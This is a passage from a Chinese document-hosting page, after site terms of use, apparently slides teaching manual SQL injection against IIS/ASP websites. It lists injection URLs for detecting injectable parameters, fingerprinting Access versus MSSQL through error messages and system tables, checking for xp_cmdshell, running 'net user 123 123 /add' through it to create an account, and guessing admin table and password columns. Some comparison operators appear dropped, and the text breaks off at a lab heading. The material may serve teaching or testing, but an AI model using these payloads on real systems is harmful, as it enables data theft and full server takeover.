- 1、原创力文档(book118)网站文档一经付费(服务费),不意味着购买了该文档的版权,仅供个人/单位学习、研究之用,不得用于商业用途,未经授权,严禁复制、发行、汇编、翻译或者网络传播等,侵权必究。。
- 2、本站所有内容均由合作方或网友上传,本站不对文档的完整性、权威性及其观点立场正确性做任何保证或承诺!文档内容仅供研究参考,付费前请自行鉴别。如您付费,意味着您自己接受本站规则且自行承担风险,本站不退款、不进行额外附加服务;查看《如何避免下载的几个坑》。如果您已付费下载过本站文档,您可以点击 这里二次下载。
- 3、如文档侵犯商业秘密、侵犯著作权、侵犯人身权等,请点击“版权申诉”(推荐),也可以打举报电话:400-050-0827(电话支持时间:9:00-18:30)。
- 4、该文档为VIP文档,如果想要下载,成为VIP会员后,下载免费。
- 5、成为VIP后,下载本文档将扣除1次下载权益。下载后,不支持退款、换文档。如有疑问请联系我们。
- 6、成为VIP后,您将拥有八大权益,权益包括:VIP文档下载权益、阅读免打扰、文档格式转换、高级专利检索、专属身份标志、高级客服、多端互通、版权登记。
- 7、VIP文档为合作方或网友上传,每下载1次, 网站将根据用户上传文档的质量评分、类型等,对文档贡献者给予高额补贴、流量扶持。如果你也想贡献VIP文档。上传文档
查看更多
手工注射-注射点类型 http://xxx.xxx.xxx/abc.asp?id=YY在页面执行中的含义: 当YY为整型参数时 当输入的参数YY为整型时,通常abc.asp中SQL语句原貌大致如下:select * from 表名 where id=YY 当YY为字符串型参数时 当输入的参数YY为字符串时,通常abc.asp中SQL语句原貌大致如下:select * from 表名 where id=YY 注意:不做特殊说明时所有参数均为整型参数,所有字符均在英文输入法状态下输入,并且站点结构为IIS+asp 判断当前url是否为注射点 参数为字符串型参数时如何判断(YY为字符串型参数) http://xxx.xxx.xxx/abc.asp?id=YY’ (单引号) abc.asp运行异常; http://xxx.xxx.xxx/abc.asp?id=YY and 1=1 abc.asp运行正常,而且与HTTP://xxx.xxx.xxx/abc.asp?id=YY’运行结果相同 http://xxx.xxx.xxx/abc.asp?id=YY and 1=2 abc.asp运行异常; 如果以上三步满足,abc.asp中一定存在SQL注入漏洞。那么http://xxx.xxx.xxx/abc.asp?id=YY就是一个注射点 判断数据库类型 利用单引号判断Access /showdetail.asp?id=49,我们在这个地址后面加上单引号’,服务器会返回下面的错误提示:Microsoft JET Database Engine 错误 80040e14字符串的语法错误 在查询表达式 ID=49 中。/showdetail.asp,行8 我们可以得出网站使用的是Access数据库,通过JET引擎连接数据库,而不是通过ODBC (mssql所用). 判断数据库类型cont. 利用单引号判断Mssql /zrxx.asp?id=49,我们在这个地址后面加上单引号’服务器会返回下面的错误提示: Microsoft OLE DB Provider for ODBC Drivers 错误 80040e21 ODBC 驱动程序不支持所需的属性。 /zrxx.asp,行 97 这就是使用Mssql数据库的站点了 判断数据库类型cont. 利用系统表 ACCESS的系统表是msysobjects,且在WEB环境下没有访问权限,而MS-SQL的系统表是sysobjects,在WEB环境下有访问权限。对于以下两条语句:1、/abc.asp?id=YY and (select count(*) from sysobjects)02、/abc.asp?id=YY and (select count(*) from msysobjects)0 注:若数据库是MS-SQL,则第一条一定运行正常, 第二条则异常; 若是ACCESS则两条都会异常。 确定XP_CMDSHELL执行情况 HTTP://xxx.xxx.xxx/abc.asp?id=YY and 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE xtype = X AND name = xp_cmdshell) 判断XP_CMDSHELL是否存在,返回正常则存在. HTTP://xxx.xxx.xxx/abc.asp?id=YY exec master..xp_cmdshell’net user 123 123/add’;-- 增加一个用户123,密码也为123,此处可使用任何NET命令。 注:此处注射必须要在Mssql下有SA权限,所以一旦成功可以直取服务器最高权限,不过成功率很低. 猜解表名和字段名 针对Access数据库 ….abc.asp?id=YY and 0(select count(*) from admin) ---判断是否存在admin这张表 ….abc.asp?id=YY and 0(select count(username) from admin) ---判断是否存在username这个字段 ….abc.asp?id=YY and 0(select count(password) from admin) ---判断是否存在password这个字段 注意:如果上面两条注入语句返回正常就说明存在表名和字段名,否则根 据常用表名和字段名多次更改和判断,这里只能凭借猜解运气. 常用表名和字段名在明小子—SQL注入—设置检测区中可以找到 实验: IIS+ASP+
文档评论(0)